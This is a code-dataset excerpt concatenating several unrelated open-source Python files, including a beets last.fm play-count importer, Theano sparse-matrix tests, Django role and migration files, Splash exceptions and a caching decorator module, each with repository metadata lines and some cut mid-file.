obj = SoapUIScriptConverter(ROOT_LOGGER)
config = obj.convert_script(RESOURCES_DIR + "soapui/gmaps-sample.xml")
self.assertEqual(len(config["scenarios"]), 10)
scenario = config["scenarios"]["Directions API TestSuite-Simple Tests"]
for request in scenario["requests"]:
self.assertNotIn("{format}", request["url"])
self.assertEqual(scenario["requests"][0]["url"], "http://maps.googleapis.com/maps/api/directions/json")
self.assertEqual(scenario["requests"][1]["url"], "http://maps.googleapis.com/maps/api/directions/json")
self.assertEqual(scenario["requests"][2]["url"], "http://maps.googleapis.com/maps/api/directions/xml")
|
kareemallen/beets | beetsplug/lastimport.py | Python | mit | 6,738 | 0 | # -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2015, Rafael Bodill http://github.com/rafi
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
from __future__ import (division, absolute_import, print_function,
unicode_literals)
import requests
from beets import ui
from beets import dbcore
from beets import config
from beets import plugins
from beets.dbcore import types
API_URL = 'http://ws.audioscrobbler.com/2.0/'
class LastImportPlugin(plugins.BeetsPlugin):
def __init__(self):
super(LastImportPlugin, self).__init__()
config['lastfm'].add({
'user': '',
'api_key': '',
})
config['lastfm']['api_key'].redact = True
self.config.add({
'per_page': 500,
'retry_limit': 3,
})
self.item_types = {
'play_count': types.INTEGER,
}
def commands(self):
cmd = ui.Subcommand('lastimport', help='import last.fm play-count')
def func(lib, opts, args):
import_lastfm(lib, self._log)
cmd.func = func
return [cmd]
def import_lastfm(lib, log):
user = config['lastfm']['user'].get(unicode)
per_page = config['lastimport']['per_page'].get(int)
if not user:
raise ui.UserError('You must specify a user name for lastimport')
log.info('Fetching last.fm library for @{0}', user)
page_total = 1
page_current = 0
found_total = 0
unknown_total = 0
retry_limit = config['lastimport']['retry_limit'].get(int)
# Iterate through a yet to be known page total count
while page_current < page_total:
log.info('Querying page #{0}{1}...',
page_current + 1,
'/{}'.format(page_total) if page_total > 1 else '')
for retry in range(0, retry_limit):
page = fetch_tracks(user, page_current + 1, per_page)
if 'tracks' in page:
# Let us the reveal the holy total pages!
page_total = int(page['tracks']['@attr']['totalPages'])
if page_total < 1:
# It means nothing to us!
raise ui.UserError('Last.fm reported no data.')
track = page['tracks']['track']
found, unknown = process_tracks(lib, track, log)
found_total += found
unknown_total += unknown
break
else:
log.error('ERROR: unable to read page #{0}',
page_current + 1)
log.debug('API response: {}', page)
if retry < retry_limit:
log.info(
'Retrying page #{0}... ({1}/{2} retry)',
page_current + 1, retry + 1, retry_limit
)
else:
log.error('FAIL: unable to fetch page #{0}, ',
'tried {1} times', page_current, retry + 1)
page_current += 1
log.info('... done!')
log.info('finished processing {0} song pages', page_total)
log.info('{0} unknown play-counts', unknown_total)
log.info('{0} play-counts imported', found_total)
def fetch_tracks(user, page, limit):
return requests.get(API_URL, params={
'method': 'library.gettracks',
'user': user,
'api_key': plugins.LASTFM_KEY,
'page': bytes(page),
'limit': bytes(limit),
'format': 'json',
}).json()
def process_tracks(lib, tracks, log):
total = len(tracks)
total_found = 0
total_fails = 0
log.info('Received {0} tracks in this page, processing...', total)
for num in xrange(0, total):
song = ''
trackid = tracks[num]['mbid'].strip()
artist = tracks[num]['artist'].get('name', '').strip()
title = tracks[num]['name'].strip()
album = ''
if 'album' in tracks[num]:
album = tracks[num]['album'].get('name', '').strip()
log.debug(u'query: {0} - {1} ({2})', artist, title, album)
# First try to query by musicbrainz's trackid
if trackid:
song = lib.items(
dbcore.query.MatchQuery('mb_trackid', trackid)
).get()
# Otherwise try artist/title/album
if not song:
log.debug(u'no match for mb_trackid {0}, trying by '
u'artist/title/album', trackid)
query = dbcore.AndQuery([
dbcore.query.SubstringQuery('artist', artist),
dbcore.query.SubstringQuery('title', title),
dbcore.query.SubstringQuery('album', album)
])
song = lib.items(query).get()
# If not, try just artist/title
if not song:
log.debug(u'no album match, trying by artist/title')
query = dbcore.AndQuery([
dbcore.query.SubstringQuery('artist', artist),
dbcore.query.SubstringQuery('title', title)
])
song = lib.items(query).get()
# Last resort, try just replacing to utf-8 quote
if not song:
title = title.replace("'", u'\u2019')
log.debug(u'no title match, trying utf-8 single quote')
query = dbcore.AndQuery([
dbcore.query.SubstringQuery('artist', artist),
dbcore.query.SubstringQuery | ('title', title)
])
song = lib.items(query).get()
if song:
count = int(song.get('play_count', 0))
new_count = int(tracks[num]['playcount'])
log.debug(u'match: {0} - {1} ({2}) '
u'updating: play_count {3} => {4}',
song.artist, song.title, song.album, count, new_count)
| song['play_count'] = new_count
song.store()
total_found += 1
else:
total_fails += 1
log.info(u' - No match: {0} - {1} ({2})',
artist, title, album)
if total_fails > 0:
log.info('Acquired {0}/{1} play-counts ({2} unknown)',
total_found, total, total_fails)
return total_found, total_fails
|
JazzeYoung/VeryDeepAutoEncoder | theano/sparse/tests/test_basic.py | Python | bsd-3-clause | 119,627 | 0.000594 | from __future__ import absolute_import, print_function, division
from itertools import product
import time
import unittest
from nose.plugins.skip import SkipTest
import numpy
from six.moves import xrange
try:
import scipy.sparse as sp
import scipy.sparse
from scipy.sparse import csr_matrix
except ImportError:
pass # The variable enable_sparse will be used to disable the test file.
import theano
from theano import tensor
from theano import sparse
from theano import compile, config, gof
from theano.sparse import enable_sparse
from theano.tensor.basic import _allclose
from theano.tests.unittest_tools import attr
if not enable_sparse:
raise SkipTest('Optional package SciPy not installed')
from theano.sparse.basic import _is_dense, _is_sparse, _mtypes
from theano.sparse.basic import _is_dense_variable, _is_sparse_variable
from theano.sparse import (
verify_grad_sparse, as_sparse_variable,
CSC, CSM, CSMProperties, csm_properties,
SparseType, CSMGrad,
StructuredDot,
StructuredDotGradCSC, StructuredDotGradCSR,
AddSS, AddSD, MulSS, MulSD, Transpose, Neg, Remove0,
add, mul, structured_dot, transpose,
csc_from_dense, csr_from_dense, dense_from_sparse,
Dot, Usmm, sp_ones_like, GetItemScalar, GetItemList, GetItem2Lists,
SparseFromDense,
Cast, cast, HStack, VStack, AddSSData, add_s_s_data,
structured_minimum, structured_maximum, structured_add,
mul_s_v, structured_add_s_v,
SamplingDot, sampling_dot,
Diag, diag, SquareDiagonal, square_diagonal,
EnsureSortedIndices, ensure_sorted_indices, clean,
ConstructSparseFromList, construct_sparse_from_list,
TrueDot, true_dot, eq, neq, le, ge, gt, lt)
# Probability distributions are currently tested in test_sp2.py
# from theano.sparse import (
# Poisson, poisson, Binomial, Multinomial, multinomial)
from theano.sparse.opt import (StructuredDotCSC, UsmmCscDense, CSMGradC)
from theano.tests import unittest_tools as utt
def as_sparse_format(data, format):
if format == 'csc':
return scipy.sparse.csc_matrix(data)
elif format == 'csr':
return scipy.sparse.csr_matrix(data)
else:
raise NotImplementedError()
def eval_outputs(outputs):
return compile.function([], outputs)()[0]
# scipy 0.17 will return sparse values in all cases while previous
# version sometimes wouldn't. This will make everything dense so that
# we can use assert_allclose.
def as_ndarray(val):
if hasattr(val, 'toarray'):
return val.toarray()
return val
def random_lil(shape, dtype, nnz):
rval = sp.lil_matrix(shape, dtype=dtype)
huge = 2 ** 30
for k in range(nnz):
# set non-zeros in random locations (row x, col y)
idx = numpy.random.random_integers(huge, size=2) % shape
value = numpy.random.rand()
# if dtype *int*, value will always be zeros!
if "int" in dtype:
value = int(value * 100)
# The call to tuple is needed as scipy 0.13.1 do not support
# ndarray with lenght 2 as idx tuple.
rval.__setitem__(
tuple(idx),
value)
return rval
def sparse_random_inputs(format, shape, n=1, out_dtype=None, p=0.5, gap=None,
explicit_zero=False, unsorted_indices=False):
"""Return a tuple containing everything needed to
perform a test.
If `out_dtype` is `None`, theano.config.floatX is
used.
:param format: Sparse format.
:param shape: Shape of data.
:param n: Number of variable.
:param out_dtype: dtype of output.
:param p: Sparsity proportion.
:param gap: Tuple for the range of the random sample. When
length is 1, it is assumed to be the exclusive
max, when `gap` = (`a`, `b`) it provide a sample
from [a, b[. If `None` is used, it provide [0, 1]
for float dtypes and [0, 50[ for integer dtypes.
:param explicit_zero: When True, we add explicit zero in the
returned sparse matrix
:param unsorted_ind | ices: when True, we make sure there is
unsorted indices in the returned
sparse matrix.
:return: (variable, data) where both `variable`
and `data` are list.
:note: explicit_zero and unsorted_indices was ad | ded in Theano 0.6rc4
"""
if out_dtype is None:
out_dtype = theano.config.floatX
assert 0 <= p <= 1
assert len(shape) == 2
assert out_dtype in sparse.all_dtypes
assert gap is None or isinstance(gap, (tuple, list))
if gap is not None and out_dtype.startswith('u'):
assert gap[0] >= 0
def _rand():
where = numpy.random.binomial(1, p, size=shape).astype('int8')
if out_dtype in sparse.discrete_dtypes:
if not gap:
value = numpy.random.randint(50, size=shape)
elif len(gap) == 2:
value = numpy.random.randint(gap[0], gap[1], size=shape)
else:
value = numpy.random.randint(gap[0], size=shape)
else:
if not gap:
value = numpy.random.random(shape)
elif len(gap) == 2:
a, b = gap
value = a + numpy.random.random(shape) * (b - a)
else:
value = numpy.random.random(shape) * gap[0]
return (where * value).astype(out_dtype)
variable = [getattr(theano.sparse, format + '_matrix')(dtype=out_dtype)
for k in range(n)]
data = [getattr(scipy.sparse, format + '_matrix')(_rand(), dtype=out_dtype)
for k in range(n)]
if unsorted_indices:
for idx in range(n):
d = data[idx]
d = d[list(range(d.shape[0]))]
assert not d.has_sorted_indices
data[idx] = d
if explicit_zero:
for idx in range(n):
assert data[idx].nnz > 1, (
"can't make a sparse matrix with explicit 0")
d_idx = numpy.random.randint(data[idx].nnz)
data[idx].data[d_idx] = 0
# numpy 1.5.0 with scipy 0.9.0 have scipy.sparse.XXX_matrix return
# typenum 10(ulonglong) instead of 8(uint64) event if they are the same!
# Theano don't like ulonglong type_num
dtype = numpy.dtype(out_dtype) # Convert into dtype object.
if data[0].dtype.num != dtype.num and dtype.str == data[0].dtype.str:
data[0].data = theano._asarray(data[0].data, out_dtype)
assert data[0].dtype.num == dtype.num
return (variable, data)
class T_verify_grad_sparse(unittest.TestCase):
class FailOp(gof.op.Op):
def __init__(self, structured):
self.structured = structured
def __eq__(self, other):
return (type(self) == type(other)) and \
self.structured == other.structured
def __hash__(self):
return hash(type(self)) ^ hash(self.structured)
def make_node(self, x):
x = as_sparse_variable(x)
return gof.Apply(self, [x], [x.type()])
def perform(self, node, inputs, outputs):
(x,) = inputs
(out,) = outputs
assert _is_sparse(x)
out[0] = -x
def grad(self, inputs, gout):
(x,) = inputs
(gz,) = gout
assert _is_sparse_variable(x) and _is_sparse_variable(gz)
if self.structured:
return sp_ones_like(x) * dense_from_sparse(gz),
else:
return gz,
def infer_shape(self, node, shapes):
return [shapes[0]]
def test_grad_fail(self):
self.assertRaises(verify_grad_sparse.E_grad,
verify_grad_sparse,
self.FailOp(structured=False),
[sp.csr_matrix(random_lil((10, 40),
config.floatX, 3))])
self.assertRaises(verify_grad_sparse.E_grad,
verify_grad_sparse,
self.FailOp(structured=True),
[sp.csr_matrix(random_lil((10, 40),
|
mitodl/lore | roles/tests/test_utils.py | Python | agpl-3.0 | 2,672 | 0 | """
Test the roles utils
"""
from __future__ import unicode_literals
from django.contrib.auth.models import Group
from django.core.management import call_command
from django.utils.text import slugify
from guardian.shortcuts import get_perms
from mock import patch
from learningresources.api import create_repo
from learningresources.tests.base import LoreTestCase
from roles.permissions import RepoPermission, GroupTypes
from roles import utils
class TestRoleUtils(LoreTestCase):
"""
Tests for the roles Utils
| """
def __init__(self, *args, **kwargs):
super(TestRoleUtils, self).__init__(*args, **kwargs)
self.repo_name = 'my little+test repo'
self.repo_desc = 'test description'
self.repo_slug = slugify(self.repo_name)
self.group_admin = GroupTypes.REPO_ADMINISTRATOR.format(self.repo_slug)
self.group_curator = GroupTypes.REPO_CURATOR.format(self.repo_slug)
self.group_author = GroupTypes.REPO_AUTHOR.forma | t(self.repo_slug)
def check_group_permission(self, repo, group, expected_permissions):
"""
helper function
"""
self.assertListEqual(
sorted(get_perms(group, repo)),
sorted(expected_permissions)
)
def test_sync_permissions(self):
"""
test the syncpermission
"""
repo = create_repo(self.repo_name, self.repo_desc, self.user.id)
# Get default permissions before wiping.
admin = Group.objects.get(name=self.group_admin)
self.check_group_permission(
repo,
admin,
RepoPermission.administrator_permissions()
)
with patch.object(utils, 'roles_init_new_repo') as mock_method:
mock_method.return_value = None
utils.sync_groups_permissions()
# Get default permissions after wiping.
self.check_group_permission(
repo,
admin,
[]
)
# Restore permissions the first call of sync_groups_permissions
# will not do anything because the permissions have been already wiped.
utils.sync_groups_permissions()
self.check_group_permission(
repo,
admin,
RepoPermission.administrator_permissions()
)
# pylint: disable=no-self-use
def test_sync_permissions_command(self):
"""
tests the sync_permission via manage.py command
"""
with patch.object(utils, 'sync_groups_permissions') as mock_method:
mock_method.return_value = None
call_command('sync_permissions')
mock_method.assert_called_with()
|
Youwotma/splash | splash/exceptions.py | Python | bsd-3-clause | 1,502 | 0.000666 | # -*- coding: | utf-8 -*-
from __future__ import absolute_import
class BadOption(Exception):
""" Incorrect HTTP API arguments """
pass
class RenderError(Exception):
""" Error rendering page """
pass
class InternalError(Exception):
""" Unhandled internal error """
pass
class GlobalTimeoutError(Exception):
""" Timeout exceeded rendering page """
pass
class U | nsupportedContentType(Exception):
""" Request Content-Type is not supported """
pass
class ExpiredArguments(Exception):
""" Arguments stored with ``save_args`` are expired """
pass
class ScriptError(BadOption):
""" Error happened while executing Lua script """
LUA_INIT_ERROR = 'LUA_INIT_ERROR' # error happened before coroutine starts
LUA_ERROR = 'LUA_ERROR' # lua error() is called from the coroutine
LUA_CONVERT_ERROR = 'LUA_CONVERT_ERROR' # result can't be converted to Python
SPLASH_LUA_ERROR = 'SPLASH_LUA_ERROR' # custom error raised by Splash
BAD_MAIN_ERROR = 'BAD_MAIN_ERROR' # main() definition is incorrect
MAIN_NOT_FOUND_ERROR = 'MAIN_NOT_FOUND_ERROR' # main() is not found
SYNTAX_ERROR = 'SYNTAX_ERROR' # XXX: unused; reported as INIT_ERROR now
JS_ERROR = 'JS_ERROR' # error in a wrapped JS function
UNKNOWN_ERROR = 'UNKNOWN_ERROR'
class JsError(Exception):
""" Error occured in JavaScript code """
pass
class OneShotCallbackError(Exception):
""" A one shot callback was called more than once. """
pass
|
favien/favien | favien/canvas.py | Python | agpl-3.0 | 3,524 | 0.001419 | """:mod:`favien.canvas` --- Canvas
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import boto3
from botocore.client import Config
from flask import current_app
from sqlalchemy.orm import deferred, dynamic_loader, relationship
from sqlalchemy.schema import Column, ForeignKey
from sqlalchemy.sql.functions import now
from sqlalchemy.types import Boolean, DateTime, Integer, UnicodeText
from sqlalchemy.dialects.postgres import JSONB
from .orm import Base
from .user import User
class Canvas(Base):
"""The canvas work."""
#: (:class:`sqlalchemy.types.Integer`) The primary key integer.
id = Column(Integer, primary_key=True)
#: (:class:`sqlalchemy.types.Integer`) Canvas artist.
artist_id = Column(Integer, ForeignKey(User.id), nullable=False)
#: (:class:`sqlalchemy.orm.relationship`) Canvas artist.
artist = relationship(User)
#: (:class:`sqlalchemy.orm.relationship`) Canvas collaborators.
collaborators = relationship(User, secondary='collaborations')
#: (:class:`sqlalchemy.orm.dynamic_loader`) Canvas collaborations.
collaborations = dynamic_loader(' | Collaboration', cascade='all, delete-orphan')
#: (:class:`sqlalchemy.types.String`) Canvas title.
title = Column(UnicodeText)
#: (:class:`sqlalchemy.types.UnicodeText`) The description of the canvas.
description = Column(UnicodeText)
#: (:class:`sqlalchemy.dialects.postgres.JSON`) C | anvas brush strokes.
strokes = deferred(Column(JSONB))
#: (:class:`sqlalchemy.types.Integer`) Canvas width in pixels.
width = Column(Integer, nullable=False)
#: (:class:`sqlalchemy.types.Integer`) Canvas height in pixels.
height = Column(Integer, nullable=False)
#: (:class:`sqlalchemy.types.Boolean`) Is this canvas broadcasting?
broadcast = Column(Boolean, nullable=False)
#: (:class:`sqlalchemy.types.Boolean`) Is replaying allowed?
replay = Column(Boolean, nullable=False)
#: (:class:`sqlalchemy.types.DateTime`) The created time.
created_at = deferred(
Column(DateTime(timezone=True), nullable=False, default=now()),
group='metadata'
)
__tablename__ = 'canvases'
@property
def key(self):
return '{}/{}'.format(self.__tablename__, self.id)
def from_blob(self, blob):
s3 = boto3.resource('s3')
o = s3.Object(current_app.config['AWS_S3_BUCKET'], self.key)
return o.put(Body=blob)
def get_url(self):
s3 = boto3.client('s3', config=Config(signature_version='s3v4'))
return s3.generate_presigned_url(
ClientMethod='get_object',
Params={
'Bucket': current_app.config['AWS_S3_BUCKET'],
'Key': self.key,
},
)
class Collaboration(Base):
""":class:`User`\ s collaborate on :class:`Canvas`\ s."""
#: (:class:`sqlalchemy.types.Integer`) :attr:`~Canvas.id` of :attr:`canvas`.
canvas_id = Column(Integer, ForeignKey(Canvas.id), primary_key=True)
#: (:class:`sqlalchemy.types.Integer`) :attr:`~User.id` of :attr:`artist`.
artist_id = Column(Integer, ForeignKey(User.id), primary_key=True)
#: (:class:`sqlalchemy.orm.relationship`) Canvas the user is collaborating on.
canvas = relationship(Canvas)
#: (:class:`sqlalchemy.orm.relationship`) Collaborating artist.
artist = relationship(User)
#: (:class:`sqlalchemy.types.DateTime`) The created time.
created_at = Column(DateTime(timezone=True), nullable=False, default=now())
__tablename__ = 'collaborations'
|
trb/Multicache | cache.py | Python | bsd-2-clause | 5,341 | 0.001311 | from types import FunctionType
import backends
__storage = backends.default()
def set_storage(BackendInstance):
global __storage
__storage = BackendInstance
def make_cached(make_key, f):
def cached(*args, **kwargs):
cache_key = make_key(args=args, kwargs=kwargs)
if __storage.has(cache_key):
return __storage.get(cache_key)
value = f(*args, **kwargs)
__storage.set(cache_key, value)
return value
return cached
def cache_function(function_or_key):
key = 'function:'
if type(function_or_key) is FunctionType:
"""No args to decorator makes the first arg the
function to be decorated"""
f = function_or_key
key = key + f.__name__
def make_key(args=None, kwargs=None):
return key + f.__name__ + str(args) + str(kwargs)
return make_cached(make_key, f)
else:
"""Arguments have been passed to the decorator.
The user wants to override automatic key creation and always
use the same, so do that here"""
key += function_or_key
def make_decorator(f):
def make_key(args=None, kwargs=None):
return key + ':' + f.__name__
return make_cached(make_key, f)
return make_decorator
__register = []
__open_queue = False
__in_init = False
__cache = {}
__next_provider = None
__update = []
def __register_update(id_, values):
__update.append((id_, values))
def do_updates():
global __update
for id_, values in __update:
__storage.set(id_, values)
__update = []
def __do_queue():
global __register
global __cache
global __open_queue
__open_queue = False
for id_, self, provider in __register:
if not __storage.has(id_):
__storage.set(id_, provider(self))
self.__cached__ = __storage.get(id_)
__register = []
def __register_class(id_, self, provider):
global __open_queue
__register.append((id_, self, provider))
__open_queue = True
def __make_id(cls, self, id_attribute):
return 'class:' + cls.__name__ + str(self.__dict__[id_attribute])
def __should_do_queue(self):
if not __open_queue:
return False
if '__in_init' in self.__dict__:
if self.__dict__['__in_init']:
return False
else:
return False
return True
def cache_class(id_attribute):
"""Cachable attributes don't have to be specified since
self.__cached__.keys() will provide all attributes that were
retrieved from cache (and could subsequently be updated).
"""
def make_class(cls):
global __next_provider
if __next_provider is None:
raise LookupError("No provider function declared. Put"
+ " the 'cache_provider' decorator on the"
+ " function that returns data for th | e"
+ " instance")
provider_function = __next_provider
__next_provider = None
old_init = cls.__init__
def new_init(self, *args, **kwargs):
self.__in_init = True
old_init(self, *args, **kwargs)
self.__in_init = False
__register_class(__make_id(cls, self, id_attribute),
| self, provider_function)
cls.__init__ = new_init
old_getattribute = cls.__getattribute__
def new_getattribute(self, key):
if key != '__dict__' and key != '__cached__':
if __should_do_queue(self):
__do_queue()
if hasattr(self, '__cached__') and key in self.__cached__:
return self.__cached__[key]
return old_getattribute(self, key)
cls.__getattribute__ = new_getattribute
old_setattr = cls.__setattr__
def new_setattr(self, key, value):
if key != '__cache__':
if __should_do_queue(self):
__do_queue()
if hasattr(self, '__cached__'):
"""Only check for updatable cache values
when a cache dict exists"""
if not hasattr(self, '__cachable_attrs'):
self.__dict__['__cachable_attrs'] = \
self.__dict__['__cached__'].keys()
if key in self.__dict__['__cachable_attrs']:
if key != self.__dict__['__cached__'][key]:
self.__dict__['__cached__'][key] = value
__register_update(
__make_id(cls, self, id_attribute),
self.__cached__)
return
old_setattr(self, key, value)
cls.__setattr__ = new_setattr
def hasattr(self, key):
if __should_do_queue(self):
__do_queue()
if '__cache__' in self.__dict__:
if key in self.__dict__['__cache__']:
return True
if key in self.__dict__:
return True
return False
cls.__hasattr__ = hasattr
return cls
return make_class
def cache_provider(f):
global __next_provider
__next_provider = f
return f
|
InScience/DAMIS-old | src/damis/migrations/0039_auto__chg_field_parametervalue_value.py | Python | agpl-3.0 | 11,165 | 0.007613 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'ParameterValue.value'
db.alter_column(u'damis_parametervalue', 'value', self.gf('django.db.models.fields.CharField')(max_length=255, null=True))
def backwards(self, orm):
# Changing field 'ParameterValue.value'
db.alter_column(u'damis_parametervalue', 'value', self.gf('django.db.models.fields.CharField')(default='', max_length=255))
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailFiel | d', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyTo | ManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'damis.cluster': {
'Meta': {'object_name': 'Cluster'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'workload_url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True'})
},
u'damis.component': {
'Meta': {'object_name': 'Component'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'cluster': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['damis.Cluster']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'description_lt': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'function': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'label_lt': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'wsdl': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'damis.connection': {
'Meta': {'object_name': 'Connection'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'source'", 'null': 'True', 'to': u"orm['damis.ParameterValue']"}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'target'", 'null': 'True', 'to': u"orm['damis.ParameterValue']"})
},
u'damis.dataset': {
'Meta': {'object_name': 'Dataset'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'damis.experiment': {
'Meta': {'object_name': 'Experiment'},
'finish': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_calc_time': ('django.db.models.fields.TimeField', [], {'default': "'2:00'", 'null': 'True'}),
'p': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'SAVED'", 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length' |
n9code/calm | tests/test_param.py | Python | mit | 1,276 | 0 | from unittest import TestCase
from calm.param import ParameterJsonType
class CodecTests(TestCase):
def test_param_json_type(self):
pjt = ParameterJsonType.from_python_type(int)
self.assertEqual(pjt, 'integer')
pjt = ParameterJsonType.from_python_type(float)
self.a | ssertEqual(pjt, 'number')
pjt = ParameterJsonType.from_python_type(str)
self.assertEqual(pjt, 'string')
pjt = ParameterJsonType.from_python_type(bool)
self.assertEqual(pjt, 'boole | an')
pjt = ParameterJsonType.from_python_type([bool])
self.assertEqual(pjt, 'array')
self.assertEqual(pjt.params['items'], 'boolean')
class CustomType(str):
pass
pjt = ParameterJsonType.from_python_type(CustomType)
self.assertEqual(pjt, 'string')
def test_param_json_type_errors(self):
self.assertRaises(TypeError,
ParameterJsonType.from_python_type,
[int, str])
self.assertRaises(TypeError,
ParameterJsonType.from_python_type,
[[int]])
self.assertRaises(TypeError,
ParameterJsonType.from_python_type,
tuple)
|
luzfcb/django-autocomplete-light | test_project/select2_tagging/urls.py | Python | mit | 295 | 0 | from dal import autocomplete
from d | jango.conf.urls import url
from tagging.models import Tag
urlpatterns = [
url(
'test-autocomplete/$',
autocomplete.Select2QuerySetView.as_view(
q | ueryset=Tag.objects.all(),
),
name='select2_tagging',
),
]
|
xanthics/gw2crafting---retired | Crafting.py | Python | mit | 21,884 | 0.040121 | #!/usr/bin/env python
'''
Copyright (c) 2012 Jeremy Parks ( xanthic.9478 )
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
